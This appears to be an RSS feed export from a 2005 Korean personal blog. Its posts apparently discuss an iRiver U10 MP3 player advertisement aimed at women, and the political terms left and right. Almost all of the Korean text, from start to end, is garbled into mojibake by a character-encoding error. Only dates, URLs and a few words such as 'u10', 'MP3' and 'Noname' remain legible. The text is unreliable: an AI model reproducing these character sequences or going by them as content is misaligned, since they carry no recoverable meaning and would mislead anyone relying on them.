    -3. ֱ¦·¹¹ּ ¾ְֶּ¾נ½÷ ³כ·¡ ֱ₪¸» ְַׁ´. (ַׁ±¹¾מֶַ ¶ףְּ¿ֲֵ· ½÷ִ«÷־÷׀ ³כ·¡µט´÷¸¸י ְ‎·־ ±׳ְַ ְֶּׂ µָ´. .... ´כֳ¼ ְּ°ֹ ³כ·¡¶ף°ם ÷ׂ·¶..)]]>
    -»ל¾ֶ°¡´.. -ַֿ³כ¾ֶ -Mon, 7 Nov 2005 14:32:17 +0900 -
    - -&#39;¹ִּ¡°ם ָ¯ְו&#39; ְּ¶ץ.. -http://chisato.info/blog/index.php?pl=668 - -
    -
    -
    -¿ְֵ° ¼¾¼¼ְַ ¿רָ­ְ½ֳָ¸°¡ ¿­¸³´ֿ´ ! ¿ְ»חִ«¿ֽ µµִל¿¡¼­ !! ְּ·²¼צ°¡ !! ְװְו·בµµ ¹«·ב !!
    -
    -
    -
    -
    -
    -
    -
    -.... ְֿ÷»¿¡ »ל¸י ±׳·± °װ ֱֱ°³׳¿ה. ₪ּ₪ּ ¹´°ַ³ ְֶׂ÷ ¿©ַאְ» ֶ´ֵ¸ ·¹¾מ÷ְֿ» °ֱַ®¿ְ´ֲ °ֽ ¿¿¡´ֲ ַׂ ¼צ ְײ´ֲ °ְּֽ ¾ר½ְ´ֿ´. ₪ּ₪ּ ¿ְֵ° ¼¾¼¼ְַ ¿רָ­¶ף´ֿ.. ¾¾.. ³¹« ÷¸·¯°¡°ם ½ֽ¾מ¿ה. ₪ּ₪ּ
    -°װ´°¡ ֶַָ­ְַ ¹ּ´ֶַֿ¸ְֵµµ ְײ´ֲ ¸נ¾חְװ´ֿ´. ¾ֶ¿ץ. ¿ְ»חִ«¿¡ »ך´¸י ¾ף¸¶³× ְֱֱ»±מ¿ה. ₪ּ₪ּ
    -
    -
    -±׳·¯°ם÷¸´ֿ ְֿ÷»¿©ַא ´³א¿ֲ ¾ך±ג¸¦ ַֿ³×µµ ¾ָ ַ´ר °ּ´ֿ´, ְת´ֲ.. '₪µ';;;;
    -
    -ְ¾ְֶ¾ֶ.. ±׳·³ ¶ַ ָ¨¿¡ µי·¯ ֲ×ְ÷ ְֿ÷»¾מְַ ¹־ֶף¸¦.. +₪µ+;;
    -
    -
    -
    -±׳³×ְת³× ¾ֶֶ®÷ְּֿ³× ַׁ ¹ר ´ץ ³×¿ְ¸י ֱֱ°³׳¿ה. ÷סַא±ג »י µיְֿ µ·ְ÷ ¾ר½ְ´ֿ´¸¸ ¾ֶֶ®÷ֿ ֱ₪µµ¾.. ¿ְ¸®ֱצ³¯ ÷ְּֿ¸י ֱֱ°½ְ´ֿ´. ¹°·׀, »נָ­°¡·־ ´ץ ְּ¸§ְּ ³פ´÷¸´ֿ »נָ­¸¦ »©°ם´ֲ ¾ֶֶ®÷ֿ ¿«´ֲ °ֽµµ ¾מ·ֱ¿ן °ְּֽ¶ף´ֲ »‎°¢ְ÷ µיֱצ¸¸.. ¿ה»חְּ´ֲ µ¥¹ּ¾ָ ¿¬ְח°¡ ָ£ֱ¶¸¦ ¶ח´ֲ µם ַֿ¿© ±ג´כ°¨ְּ ֱץֶרµַ°ם ְײ½ְ´ֿ´. µ¥¹ּ¾ָ ¾ֶֶ®÷ֿ ַׁ ¹ר ¾ָ ³×¿ְ³×.. ַֿ°ם..
    -
    -¿ְַַ¼ָ »חְֶּ®ְַ ְזְ÷ ָ®ְ־ְ÷ °ַ°­¿¡ ¾ָ ֱֱ±÷¿ה(ִנ·°). ¾ֶ¿ץ. ¿ְ»חִ« °¡°ם ½ֽ´ !! >.<;; (ְ½ֳָ¸´ֲ µµִל¿¡¼­µµ ¿­¸®´ֲµ¥ ¿ְ»חִ«¿¡ ֱ‎ֲרַֿ´ֲ ְְּ¯´ֲ?)]]>
    -»ל¾ֶ°¡´.. -ַֿ³כ¾ֶ -Thu, 27 Oct 2005 21:00:48 +0900 -
    - -¾ְֶּ¸®¹צ u10 ±₪°ם µ‎ֱצ°ֹ±ג -http://chisato.info/blog/index.php?pl=667 -TV ¸¦ ְ ÷¸´ֲ ֶםְ÷ ¾ֶ´ֿ¶ף¼­ ¾נֱ¦÷־ֵֽ ³×¿ְ´ר °ְֽ־ֱצ ÷ָׂ®½ֱַַֿצ¸¸, ²ֿ ½ְְֳֿ÷ ֱצ³­ ±₪°ם¶ף°ם »‎°¢ַׁ´. ¾מֲ·°ֵ³×, ¾ְֶּ¸®¹צ u10 ְַ ±₪°ם µ‎ֱצ°ֹ±ג. :)
    -
    -
    -
    -µי¾מ°¡±ג ְ¿¡.. ³×´ֲ ¹°·׀ ¾ײֳַ»חְּµוApple-Side¿¡ ¼׃ַׁ »ח¶קְּ°ם.. ¸ְֶ» ¾²°ם ְײ°ם.. ¾ְֶֶּקµו ְֶּׂ°ם.. ְג½÷ ±³ֱײ, ¶ף´ֲ ָ£ִ× ְ »ח¿כַֿ´ֲ »ח¶קְֱּצ¸¸ ±׳·± ¿¬ְ¯¿¡¼­ ¾ְֶּ¸®¹צ ±₪°ם¿¡ µ‎ֱצ¸¦ °ֹ°´´ֲ °ְֽ÷ °ב´ִ ְ‎´כ·־ ³׳¹צ³׳¹צ ¾ֶ´װְ» ¹אַפµ׀´. ְּ°ַ ±׳³ֹ.. ³»°¡ ֱס°ַֿ´ֲ ±₪°ם µ‎ֱצ°ֹ±גְַ ְֿ÷־ְֿ »׃.
    -µ¶ף¼­ ְּ¹ר¿¡ ¾ְֳ¸·ֱ´ֲ ±₪°םµµ.. ֱ»´ץ ֱקֱ¢ְְ¸·־ ¾ְֶֶּקµו¸¦ ¾נ±ַׁ [¾ְֶֶּקµו ¾ֶ·¡¸¦ ֲ©¸£¹ָ ְ¯ֵ ³×¿ְ¼ְ !] < ְּ°ֵ ¾ֶ´ֿ°ם..
    -
    -.... ¹·־ ְּ°ֵ´ !!
    -
    -
    -
    -
    "¶ָ°°ְ÷ ¿ְ» ְװְ÷ »ח¶ק¸¸ ÷ֱµµ ±ג÷׀³×»µ¥, ¸נµ־ ¶ָ°°ְ÷ MP3 ֳַ·¹ְּ¾מ?"

    -
    ¾צ¸׃, ¾נ´µ. ±ג÷׀ ³×»»ן.

    -
    -ֶ¯ָק ¿©ְµיְּ¶ף¸י °ר°¨ַׂ ³»¿כְּ´. ¾צ¸״¸׃ ±ג÷׀ ³×»½. ¸¶³׳ֵ· °°ְ÷ ¾ײµיְּ ¼ֲ¶ׁ·ח ³×¶ ¶ָ°°ְ÷ ¿ְ» ְװ±¸ ³×¿װ½י. ±גֱצ¹טµי. ´«µיְ÷ ³פ¾ֶ°°±¸.
    -
    -ְ¼ת·־´ֲ [ֱקֱ¢ְְ¸·־ ¾נ±]ַׁ ±₪°ם´ֲ ´¸¥ °ְּֽ¶ף°ם ֱַצ¸¸ ½ַ»ף ְּ°ֽµµ ´¸¦ °װ ¾ר´. ¾ֶ´ֲ »ח¶ק¿¡°װ´ֲ ´ ÷¸ְ־´. ¾ְֶֶּקµו¸¦ ¾ֳ°ם ְײ´. ±׳¸®°ם ¾ְֶּ¸®¹צµµ ¿ל¸®°¡ ´«ִ¡ֳ₪±ג¸¦ ¹·¨ְ» °ֵ´.
    -
    -
    -
    -¿©ְµיְּ ¾ְֶֶּקµו¸¦ »ח´ֲ ְְּ¯´ֲ (ֶע±ױְְ־ ְַ¹ּ¿¡¼­) ³²ְµי°ת ´¸£´. ¹°·׀ ¸נµח ¿©ְ, ¸נµח ³²ְ°¡ ֱ₪ַָ­µָ ±¸¸ֵֶ׀ְֵֿ» ÷¸ְּ´ֲ °ְֽ÷ ¾ֶ´ֿ°ֱצ¸¸ ¾מµנ±מֱצ³× ֶע±ױְְ¸·־ ֱ₪ַָ­ַׁ ÷־÷׀ְ» ¾נ±ַׁ´.
    -
    -¿©ְµי¿¡°װ °¡ְו ְ ֶָ¸®´ֲ ¾ְֶֶּקµו´ֲ? ְּ¹ר ¸®´÷¾ף·־ ֱ¶±ְ÷ ֶַµµ°¡ ´¶ףֱ®¾ ַֿ°ֱצ¸¸ ´הְ÷ (ַצְח ´ֱ¾µָ) ¾ְֶֶּקµו ¹ּ´ֿ, ±׳°ֽµµ [ַ־ֵ©¹ּ´ֿ] ´. ֲֵָס¾נ´ֿ ִ¡¸¶¸¦ ÷¸¼ְ. ¸שֳ¢ ÷׀ָ« ִ¡¸¶¸¦ ְװ°ם ³×¿װ´.
    -¾ְֶֶּקµו ַ־ֵ©¹ּ´ֿ. ְּ°ְֽ÷ '¿©ְ'µיְּ °¡ְו ¿­±₪ַֿ´ֲ mp3p ¿´´.
    -
    -±׳·± ¿©ְ־µי¿¡°װ ¾ְֶּ¸®¹צ ְֿ°¥ ! "¿ײ ¶ָ°°ְ÷ ¿¥ַַַַ µי°ם ´³א¿ה?"
    -
    -
    -ֲ½ֵַֿ°ם ְח¹ְּײ´ֲ ±₪°ם´. ±׳·¯³×, ְּ·¸°װ »‎°¢ַֿ°ם ְײ´¸י ¾ְֶּ¸®¹צ°¡ ¾ְֶֶּקµו¸¦ ְּ±ג±ג´ֲ ֱ¶± ¸ײ¾מ÷¸ְ־´. ÷»ֱתְ» ²ח¶ױֱצ ¸רַֿ°ם ְײ´ֲ °ְּֽ´. ¾ֶ´ֿ¸י ÷»ֱתְ» ¾ֻ¸י¼­µµ ¸נ¸£´ֲ ֳ´ ַֿ´ֲ °ֵ´ר°¡..
    -
    -
    -
    -
    -
    -¿©ְµיְּ [ְֿ¹ְְ¸·־] °דִ¡´ֲ ¿ ְװ´ֲ °ֹ ½ָ¾מַׁ´´ֲ °ְֽ÷ ְ ¾ֻ·ֱֱר »ח½ְַּ´. ½ֱַ¦·־ ±׳·²±מ? ³­ ¸נ¸£°ֱצ¸¸..
    -¾מֲ·µח ±זְ» °¡´°¡ ¶ָ°°ְ÷ ±¸µ־ ½ְֵ÷ »ח¶קְ» ÷ֱ¼­ ±ג÷׀ְּ »ףַׁ ³×¸׃ֱצ ±׳ ְ¸®¿¡¼­ µ±ְֱ» ÷׀ֱת·¶´´ֲ ¸נ ¸נµ¨ְַ ְָֿ­¶ף°ֵ³×, µ־»ךְ§÷ךְַ ֳ±ג±₪°ם¿¡ ³×¿װ´ר, ִֶֶ¼¿¡¼­ °דִ¡´ֲ ¸ס°ְֹּ¸¦ ÷¸°ם ±ג÷׀ְּ ³×÷¼­ ¸ס°ְֹּ¸¦ ¹צ¸®´ֲ ְּ¹ּ¿¬ְַ ¿¡ַַ¼ׂµו.. ¿©ְµיְ÷ ֱרֲ¥·־ ¶ָ°°ְ÷ ¿ְ» ְװְ÷ »ח¶ק¸¸ ÷ֱµµ ±ג÷׀ ³×» °ְּֽ ֶ²¸²¾ר´.
    -
    -±׳·±µ¥ ²ְ ±׳·²±מ? ֱרֲ¥ ¿©ְµיְ÷ ¶ָ°°ְ÷ ¿ְ» ְװְ÷ »ח¶ק ÷¸¸י, [¹«ֱ¶°ַ] ±ג÷׀ ³×»±מ?
    -
    -
    -
    -
    -
    -ֱ₪´ה : ¾ֶ´ֿ´.
    -
    -
    -
    -
    -
    -¿©ְµיְּ ¶ָ°°ְ÷ ¿ ְװְ÷ »ח¶ק ÷¸¸י ±ג÷׀ ³×» ְְּ¯´ֲ °£·«ָק ¼³¸םַֿ¸י ְּ°ֵ´. ³»°¡ ¹ַ°ֶָ¾ֶ °ם¸£°ם °ם¸¥ ְּ ¸ֱר ¾ְְֵֶּּ, ָחַׁ »ףַ°ְּ°ם ³²µיµµ ´ ְװ°ם ְײ´´ֲ °װ ְֱ¸½ֹ »ףַׁ´´ֲ °ֵ´. ³×¸¸ְַ ¾ָ¸ס, ³×¸¸ְַ ·¹¾מ ¾ְְֵֶּ־ ֱ ¾ֻ¾ׂ´ֲµ¥..
    -³²ְµיְּ¶ף°ם ±׳·± °זַט ¾רְ¸½ֵ°¡? ¹ּ´ִֿ« ¼צֱ‎ַֿ´°¡ ֳ·¹¾מ ¾ְְֵֶּ» ¼ױ¿¡ ³ײ¾ת´ֲµ¥, ְ¶ַֿ·ֱ°ם µי°ם°£ ´ְ½³¯ ַ׀±³¿¡´ֲ ְּ¹ּ ֲ¦ְּ ±׳°ֹ ְ¶ַֿ°ם ְײ´. .... ֱ¨ְו ! ָ­°¡ ³×´ֲ ³×¸׃ֱצ °¡¹ז¿¡¼­ ²¨³»ֱצµµ ¸רַׂ °ֵ´. ¿ײ? ֲ¦ְּ °¡ֱצֱצ ¸רַׁ °ֵ¶ף¼­ ±׳°ֹ ֱֱ¾ֶַ³×? ¾מֲ·°ֵ³×, ±׳°ְּֽ »ח¶קְַ ½ֹ¸®.
    -
    -±׳·±µ¥ ְּ»ףַׁ ְֿµµ ְײ´. ¿ײ ¿©ְµיְ÷ ¸ֵ ½ֱֳנ ¶ָ°°ְ÷ ¹י°ת ¶ָ°°ְ÷ ±¸µ־¿¡ ¿­±₪ַׂ±מ? °¡ֲ¥¶ףµµ ְֱֱ¸´ֿ ֱַ¶ף´ ·־°ם°¡ ´ץ ±׳·²µםַֿ°װ »ץ°ֱר °¡¹זְ» ±¸ַֿ·ֱ°ם ֳ£¾ֶ´´ֿ´ר ±׳³אµיְ÷ ´ ¾מµנ°¬ֱצ? ±׳³אµיְ÷ °°ְ÷ ¿ ְװְ÷ »ח¶ק ÷¸¸י ±ג÷׀ ¾ָ ³×»°¡? ³×»°¡? ±ג÷׀ ³×»¸י ¾מ¶»°װ ֲ¦ְֵ» ±¸ַֿ¸י¼­±מֱצ ֱַ¶ף´¶ ¶ָ°°ְ¸·ֱ°ם ַֿ°ם ¿¥¾¾¿¥ ¹י »ח·ֱ°ם ַֿ°ם ¿¡¸£¸½÷, ¹צ¹צ¸®, ·חְּ÷ֵכ, ֶׂµנ.. ±׳·±°ֵ ¿¸י¼­ ´´ֿ´ֲ °ֹ±מ?
    -
    -
    -
    -
    -ֶקְ־ֶ®´ֲ ¿©±ג´. ³²ְµיµµ ¶ָ°°´. ¹ּ´ִֿ« °°ְ÷ °ֵ¾, ·¹¾מ¾ְֵֶּ °דִ¡¸י ±ג÷׀ ³×»°ֱצ¸¸ ֱרֲ¥ ַ×ֱ¶¶ף¸י? ֶה¶ף¸®¶ף¸י? ֶק¸£½¦¶ף¸י? ¾ך±ג´ֲ ´¶ףֱר´. °¿ל °דִ¡´ֲ °ֵ ֱ₪µµ·־ ±ג÷׀ ¾ָ ³×»´. ¿ְָק·ֱ ָו¹µַׁ ¸¶ְ½µµ µי°ֵ´. "ָל.. ¾ײµיµµ ְֱּ¦ ְּ ֱ¦ַ°ְַ ֱר°¡¸¦ ֱ» ¾ֶ´ֲ ±÷." ³»ֱצ´ֲ, "³¹« ´ֱצ ¾°װ ֶםְװµֹ ¼צ ְײ¾מ¼­ ´ַאְּ±÷." ַֿ´ֲ ¿לֲבַװ. .... ¾נ´ץ½÷ִֵ~?
    -
    -
    -¹®ֱ¦´ֲ ¾ְֶֶּקµו°¡, ַֿ³×ְַ [¹®ָ­]¶ף´ֲ °ֵ´. ְּ°ַ °דִ£´°ם ±ג÷׀ ³×» °װ ¾ֶ´ֿ´. ¾ְֶֶּקµוְַ ¼¼»ף¿¡ ¹ְ» µי¿´´´ֲ »ח½ְַּ »ׁµםַֿ´, ¹·־ ְּ°ֵ´. ±׳·±µ¥ °ֵ±ג´ ´כ°ם [´ ¶ָ°°ְ÷ ¿¥ַַַַ ±ג÷׀ ³×÷¿°] ¾ֶ¹«¸® ¿¿צ÷ֱ¾ ²פ´צ¾ר´. ¿ײ³ִ? ¿©ְµי¿¡°װ ¿¥ַַַַ´ֲ ½ְֳו¿¡¼­ ¹ַ°ֶָ¾ֶ ±¸ְװַׁ ¸¸¿רֲ¥¸® µ¶ֶ¯ַׁ ֶ¼¼ֳֵק°¡ ¾ֶ´ֿ´ֿ±מ !!
    -
    -
    -
    -
    -
    -¾ְֶּ¸®¹צְַ ְּ¹ר ±₪°ם´ֲ ¹°·׀ ¸ֱצ´. ֱ¦ַ°ְַ ¿°µµ ½ֵ¼±ַֿ´. ֱַֿצ¸¸ ְּ¹ּ ¿¥ַַַַ ½ְֳוְ÷ ֶקָ­»ףֲֵ´. ¸ֱר ±₪°ם¿ֽ ½ֵ¼±ַׁ ¿°ְּ ֶַ¸ֵ¸¦ ÷¸ְוַ״ֱײ´ֲ ½ֳ´כ´ֲ °¬´. ְֱּ¦ ¿¥ַַַַ ½ְֳוְ÷ ´ץְּ»ף ÷ם·ח¿ְ¼ְַּ ¾ֶ´ֿ´. ·¹µו¿ְ¼ְַּ´. ִ¡¿­ַֿ°װ ½־¿צ¾ ַׁ´. ¹®ָ­ְַ ְ¸®¸¦ ֲקֱצַֿ°ֵ³× ±ג¼ת·ְֲ¸·־ ½ֲ÷־ַ״¾ ַׁ´.
    -
    -ֶ®·£µו, ְ¯ַא, ½ֱֳנ, ְּ·± °ֵ¿¡ ¿­±₪ַֿ´ֲ ¿©ְµיְּ ֵ¸±ךְּ¶ף¸י ¹®ָ­¸¦ ¼±ֱ¡ַ״¾ ַׁ´. ½÷ֶו, ¾ף¸®, ¸ֵ´ֿ¾ַ, ְּ·± °ֵ¿¡ ¿­±₪ַֿ´ֲ ³²ְµיְּ ֵ¸±ךְּ¶ף¸י ±ג¼ת·ְֲ» ָ£¼ַׂ״¾ ַׁ´. ±׳·±µ¥ ¾ְֶּ¸®¹צ´ֲ ¹÷°¡? ¹÷°¡ ְ¸ר µַ¾ת´. ¹®ָ­´ֲ ³ץֳֶ´ֲµ¥, ±ג¼ת¾ך±ג´ֲ ֱ¡ֱ¡ ֲֹ±׳¶ףµח´. ¾ְֶּ¸®¹צ´ֲ ֶ²¸²¾רְּ ¾ְֶֶּקµו¿¡ ¾ר´ֲ ¹«¼צַׁ ±ג´ְֹּ ´ד°ְײ´ֲµ¥, ±׳ ¾ך±ג´ֲ ¾ַָׂ·ֱ°ם ַׁ´. ְ²¸¸ ¾ְֶּ¸®¹צ°¡ ¸ְײ´´ֲ ¾ך±ג·־ °¡·ֱ°ם ַׁ´. ¿ײ? ִנַ״÷¸ְֱּצ ¾¾ֶ¼­? .... ֱצ± ַׁ ´כ¶ףµµ ´ץ ֶָ°´´ֲ ְ‎¹ַװְּ ְײ´¸י ִנְּ°ם ַײְּ°ם µֱת ¶§¶ץ ¸»ְ־°¡ !
    -
    -
    -
    -
    -±₪°ם´ֲ ¹צֱ¯ְּ ¿©·¯°³·־ ֱ״÷סµַ¾מְײ´´ֲ µ¥, ³»°¡ ÷» °ְּֽ ְ÷־ְ־ֱצ´ֲ ְ ¸נ¸£°´. ¾מֲ·°ֵ³× ³×´ֲ ¼¼¹רֲ° µµְ ±מֱצ ÷¸¾ׂ´. ְּ°ְּֽ ¼¼¹רֲ° µµְ. ֳ¹¹רֲ° µµְְ÷ µנְְ־(¹׳ ֱ¶ְ¹‎) ¾ך±ג, µ־¹רֲ° µµְְ÷ »ח¿כ¹‎ ¾ך±ג¿´´. ֱַֿצ¸¸ ¹ָּםַֿ´. u10ְ» ֳ³ְ½ ÷ְֳ» ¶§ ±׳ ַץ½ְְֵ׃¿¡ ´כַׁ ³מ¶ף¿עְ» ±₪°ם´ֲ ¸נµ־ ´ד¾ֶ³»ֱצ ¸רַֿ°ם ְײ´. ְ²¸¸ ¹®ָ­¸¦ ¿מ¿מַׁ´. (»ח¿כ¹‎ °·ְֳ÷ ֱ» ³×¾ֱׂצ¸¸ °ֵ±ג¿¡µµ ¹®ֱ¦´ֲ ְײ´. ְּ ¾ך±ג´ֲ ´ְ½¿¡ ±גָ¸°¡ µַ¸י..)
    -
    -°ת¿¬ ¿©ְµיְ÷ ְּ ±₪°ם¸¦ ÷¸°ם ³מ¶ף¼­ ¾ְֶּ¸®¹צ¸¦ »ח¾ַׁ´°ם ´ְ³¢°װ µֹ±מ? ¾ֶ¸¶ ¾ֶ´ׂ °ֵ´. ±׳³ֹ ְח±ג¹¶צַׁ ±₪°ם¿¡ ֱצ³×ֱצ ¾´ֲ´. ±₪°ם ְֳ¼°¡ ְ־±¸¿¡ ָ¸ְµֹ ¼צ´ֲ ְײ°ֱצ¸¸, ֶַ¸ֵ¿¡ ֵ« ¿µַגְ» ¹ִּ¡±ג¿¡´ֲ ֶַֹ®°¡ ¾מ±³­ ±₪°ם¶ף°ם »‎°¢µָ´.
    -
    -
    -
    -
    -
    -+ µ¡.
    -±טֲֵָס´ֲ ְּ»´ץ¶ף.
    -
    -+ µ¡2.
    -¹°·׀ ¿©±ג¼­ ¾נ±ַׁ [¿©ְ]´ֲ ¿©¼÷ ¸נµ־¸¦ ´כ÷¯ַֿ´ֲ °ְֽ÷ ¾ֶ´ֿ´. ¸םַ°¿¡ ¿­±₪ַֿ´ֲ 'ְֿ÷־ְַ ¿©ְ'µיְ» ¸»ַׁ´. ֱַֿצ¸¸ ְּ ±₪°ם ְֳ¼°¡ ֵ¸±ךְ¸·־ »ןְ÷ °ֽµµ ¹·־ ±׳·± »ח¶קµיְּ´ֿ±מ ֵ©°װ ¹®ֱ¦´ֲ ¾רְ» °ְּֽ¶ף »‎°¢ַֿ°ם ְײ´.
    -
    -+ µ¡3.
    -±׳¸®°ם °¡ְו ±ג÷»ְְ־ ¹®ֱ¦ְ־µ¥.. u10 ±₪°םְַ ֳ¹¹רֲ° ½ֳ¸®ֱמ´ֲ ְ»חְַ h10 ±מֱצ ¾ְֳ¸¸ח ֳײ¼±ְ» ´ַֿ°ם ְײ´. ±׳·±µ¥.. ±׳·³ ְּ ´ְ½¿¡´ֲ ¾מֲ¿ °ֵ³ִ? ¾ְֶּ¸®¹צ ¿¥ַַַַ ±÷ְ÷ ַגִָ ¸נµ־°¡ ְּ·± ֱִ¼ֱ(³» ±ג÷׀¿¡ ¸ֲֳח ÷¯ַֿ´ֲ)ְ¸·־ ³×°¡´ֲ °ַ°¡? ±׳°ַ ¾ֶ´ׂ °ֽ °°ְ÷µ¥?
    -ֱצ±¸¸ ַ״µµ t10, t20 µמְַ ½ֳ¸®ֱמ°¡ ֱ¸ְחֱַֿצ ¾´ֲ°¡. ±׳·¸´¸י °ֲµיְ÷? °ֲµיµµ »חֱצ ¸»¾ֶ¾ ַֿ³×? ´ ¶ָ°°ְ÷ ¿¥ַַַַ ְֵֿµ¥. .... ְּ·± ְֳז¼צ¸¦ µ־±ג¿¡´ֲ ¾ְֶּ¸®¹צ°¡ ±׳·¸°װ ¿©ְ¯¸¸¸¸ »ףֲֵ´ֲ ¾ֶ´ׂ °ֽ °°ְ÷µ¥, ±½ך ְ ¸נ¸£°´.]]>
    -±׳°ְֽ» ¾ֻ·ֱֱײ¸¶ ! -ַֿ³כ¾ֶ -Thu, 27 Oct 2005 11:57:42 +0900 -
    - -±ֽ³³¹‎ְַ ¼¼°ט, ¿¬¿×¹‎ְַ ¼¼°ט -http://chisato.info/blog/index.php?pl=666 -¼¼»ףְ÷ ְַ¿·־ »ל±ג ָµח °קְּ¾ת´. ¾מ¸± ¶§´ֲ ±׳·± ְֱ» ¸פ¶תֱצ¸¸..
    -ְ¶ף¸י ְ¶צ ¼צ·ֿ ֱ¡ֲק ¶ַ·ַַ״ֱצ´ֲ °ז±¸´ֲ ¹·־ ְּ°ְּֽ´.
    -
    -
    -
    °¡¸¸ָק ְײְ¸¸י ֱ°£ְ÷ °£´

    -
    -¼­±ֲַ ְְּֿ´. ¾ֶ´ֿ, ¾מֲ¼¸י ²ֲןַׁ ְְּֿ¶ף°ם ַ״¾ ֱַׂצµµ ¸נ¸£°ֱצ¸¸. °¡¸¸ָק ְײְ¸¸י ֱ°£ְ÷ °£´. ְּ°ַ »ל¸י »ל ¼צ·ֿ, ֱ¡ֲק·־ ְ§¿כְּ ´ח´חַ״ֱ®°¡°ם ְײ´. ´©±÷°¡ ±ת÷־¼ֱֵײ¸י ְֱֱ¸·ֳ¸¸, ¾מֲ·°ֵ³× ¿©ֱצ²¯ ְ־°£ְ÷ ´ֳ ±׳ ¾ױ¿¡ ±ת¾מֱ®¿װְ¸´ֿ±מ.
    -
    -¹°·׀, ±׳·³¿¡µµ ÷ׂ±¸ַֿ°ם °ט¼׃ַֿ¿© µ¹ֱרַֿ´ֲ °ְּֽ ְ־°£ְַ ¸ֵ·ְֲּ±גµµ ַׂ °ְּֽ´. °¡¸¸ָק ְײְ¸¸י ֱ°£ְ÷ °¥ֵµ¥, ±׳·¡µµ ְ־°£ְ÷ °¡¸¸ָק ְײְ¸·ֱ ֱַֿצ ¾ְ¸´ֿ±מ. ÷ך¶ף÷¸. ¸ֱצ´. .... ½ְַ÷ ±׳·± »ח¶קµי, ¸ֵ·ְְֲּ±ג´ֲ ֱַֿצ¸¶´ֲ..
    -
    -
    °¡¸¸ָק ְײְ¸¸י ֱ°£ְ÷ °£´

    -
    -ְ§ְַ ¼¦ְ÷, ÷ם·־±׳ [ַֿ´ְֳּ ¹«³ֱ®µµ ֱ₪ְַ¸¦ ¼¼¿צ¶ף] ְַ ֶק½÷ֶ®¿¡ ³²°ֱר Noname ´װְַ ´ה± ְֿ÷־ְּ´.
    -(ֶק½÷ֶ®ְַ ַ״´ח ´ה±÷־ : http://justice.naezip.net/blog/index.php?pl=11#r59)
    -
    -
    -
    -»ח½ַ Noname ְּ¶ף´ֲ ÷׀ְּ ÷ם·־±׳¸¦ ¿מ¿µ ְֱּ½ֳ¶ף¸י(ָ₪ְ÷ ´¸¥ ֱײ¼ׂ°¡ ³כֳגµַ¾מְײ´¸י) ±׳ְֲ¸·־ ÷¸³»°ם ½ְֽ÷ ³»¿כְּ¾תֱצ¸¸ ±׳·¸ֱצ ¾ְ÷ °°ט·־ ָ¥ְ ½ב³»·ֱ°¡´ֲ ְֲ» ֳֵַֿ°װ µַ¾ת´. ָ₪½ֳ, Noname ´װְּ ±ֳ³¿¡ °ט½ֵ´¸י ²ְ ְּ ±ְ» ְ׀¾מֱײ½ֳ±ג¸¦ ¹¶ף°ם ְײ´.
    -
    -³×´ֲ ¾מ´ְ ַׁ ְֲַ ֶםְ» µי°ם ½ֱֽצ´ֲ ¾´. ¿ְ·¡ »ך °ְֽ÷ ¾ֶ´ֱֿצ¸¸, ¾מֲ·°ֵ³× »ח¶קְּ ְ½ְֵַ »‎°¢ְ» °¡ֱצ°ם ±׳°ְֽ» ¶ׂ½ְֹײ°װ ¹׀¾מ÷ְּ´ֲ °ְּֽ ½¬¿מ ְְֿ÷ ¾ֶ´ֿ¶ף´ֲ ֱ¡ְ» ֱ¶±ְ÷ ±ת´°ם ְײְ¸´ֿ±מ. ±׳·± ְַ¹ּ¿¡¼­ ¾מµנ ַׁ ֲ¿¡ ֱ ¼­¼­ ÷ְׂ» ÷ְּ°ם ½ְֽ÷ ¸¶ְ½µµ (ְ¾מµµ ´ח÷׀°£ְ÷) ¾ר°ם, ¶ַַׁ ¾ֱֶק ½ְֱֳ₪ְַ ´װ¿¡ ´כַ״¼­µµ, Noname ´װ¿¡ ´כַ״¼­µµ ְ ¾ֻ°ם ְײ´´ֲ ְ÷־´ֲ ¾רְ¸¹ַ·־ °ב´ִ ְּ ±ְּ [ֶםµי±ג] ¼÷ ֶק½÷ֶ®´ֲ ¾ֶ´ֿ¶ף´ֲ ֱ¡ְ» °ֵµל°ֵµל ָ®¾נַ״µ־°ם ½ֽ´.
    -
    -³×´ֲ ´¸¸, Noname ´װְּ ְ¸ר ¾ֻ°ם °ט½ֳ´ֲ ֱ¡ ַֿ³×¸¦ ¾ֻ·ֱµו¸®°ם ½ְֽ÷ °ֽ »׃ְּ´.
    -
    -
    -
    -
    -
    -
    -ֱֲִֶ, ¿לִֶ¶ף°ֵ³× ַֿ´ֲ °³³הְ÷ »ח½ַ ±¹³»ְַ ֶ¯¼צ»ףָ²¿¡ ְַַֿ¿© ¸¹ְ÷ ֳ₪»צְּ µַ¾מ¹צ¸° ¹, ¿ר·¡ְַ »חְְ ְַ¹ּ¿ֽ´ֲ ֱ¶± µ¿¶³¾מֱר »ףֲֵ·־ ¾²ְּ´ֲ °ז¿ל°¡ ¸¹´. ֱַֿצ¸¸ ¾מֲ·°ֵ³× °£´ַֿ°ם ´¼רַֿ°װ(ַצְח ´כֱ¿¡°װ °¡ְו ³־¸® ¾²ְּ°ם ְײ´ֲ ¿כ·´כ·־) ֱ₪ְַַֿ°ם µי¾מ°¡°´. ½ֱַ¦·־ Noname ´װְ÷ ±׳·± ¹ז½ְִ¸·־ ¿כ¾מ¸¦ ¾²½ֵ µם ַֿ´ֿ±מ ֵ« ¹®ֱ¦´ֲ ¾רְ» °ֵ´.
    -ֱֲִֶ, ´ֲ »חָ¸ֱײְַ°ט¿­, ¿לִֶ, ´ֲ ְְ¯ֱײְַ°ט¿­·־ »‎°¢ַֿ°ם µי¾מ°¡ְ. ¹°·׀ [»חָ¸ֱײְְַַ ¹´כ°³³ה]¿¡ ´כַ״¼­´ֲ ½ֳ°¢¿¡ µ¶ף ´הְּ ´¶ףֱצ´ֲµ¥, ¹¹ ְְ¯ֱײְַ°¡ ¾ֶ´ֿ¶ף ¹־ֱײֱײְַ, ָ₪ְ÷ ֱ¦±¹ֱײְַ, ְֳ¼ֱײְַ, ְ÷»ֱײְַ.. ´¾חַׁ ´הְּ ֱ¸ְחַֿ°ם ְײ´. ±׳·± ³םְַ´ֲ µ·־ ¹ּ·חְ. ֱצ± ַֿ·ֱ´ֲ ¾ך±ג´ֲ ֱ» ´ץ °¡÷­¿מ ¾ך±ג´ֿ±מ.
    -
    -ַׁ±¹ְ ֶ¯ְּ¼÷ְ» ´ץ ְְּװַׁ´¸י ֱֲִֶ´ֲ ֱר÷¸, ¿לִֶ´ֲ ÷¸¼צ ֲכ µַ·ֱ³×?
    -
    -
